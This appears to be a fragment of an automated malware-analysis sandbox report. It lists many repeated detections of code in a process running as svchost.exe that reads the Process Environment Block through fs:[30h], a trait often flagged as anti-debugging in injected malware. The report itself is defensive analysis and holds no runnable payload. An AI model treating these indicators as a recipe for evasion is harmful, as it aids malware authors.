            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
